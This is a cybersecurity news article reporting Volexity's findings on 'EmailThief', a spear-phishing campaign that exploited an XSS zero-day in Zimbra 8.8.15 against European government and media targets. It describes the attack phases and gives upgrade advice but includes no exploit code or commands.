A recently reported zero-day vulnerability in the Zimbra open-source email platform is currently under active exploitation, primarily by a threat actor believed to be associated with China. This exploitation is part of a series of targeted spear-phishing campaigns that began in December 2021.
The cyber operation, referred to as “EmailThief,” has been discussed in detail in a technical report released by cybersecurity firm Volexity. It indicates that exploiting the cross-site scripting (XSS) vulnerability could allow attackers to execute arbitrary JavaScript code within the context of a user’s Zimbra session, presenting significant security risks.
Volexity has attributed these intrusions, which reportedly commenced on December 14, 2021, to a previously unrecognized hacking group identified as TEMP_HERETIC. The group is specifically targeting European government and media organizations. The vulnerability in question affects the latest open-source version of Zimbra, specifically version 8.8.15.
The cyber-attacks appear to have unfolded in two distinct phases. The initial stage involved reconnaissance and the deployment of emails aimed at monitoring whether victims opened the messages. Following this, a second phase commenced with multiple email waves designed to entice targets into clicking malicious links.
Over two weeks, attackers established 74 unique Outlook.com email accounts to disseminate these messages. The reconnaissance emails featured generic subject lines, including invitations to charity events and airline ticket refunds, to increase their chance of being opened.
Successful exploitation requires the target to click on an attacker’s link while logged into the Zimbra webmail client via a web browser. However, the attack vector could also originate from a standalone application, such as Thunderbird or Outlook, capable of launching the malicious link.
The vulnerability, if successfully weaponized, could allow attackers to exfiltrate cookies, providing them with persistent access to compromised mailboxes. This could also enable phishing campaigns from the affected account to broaden the attack surface and potentially lead to the deployment of additional malware.
Volexity noted that while none of the identified infrastructure matches that of previously documented threat groups, the nature of the targets and the lack of financial motivation suggest that this attack was likely initiated by a Chinese APT actor. Given the current state of vulnerabilities in Zimbra, users are advised to upgrade to version 9.0.0, as version 8.8.15 currently remains unpatched and vulnerable.
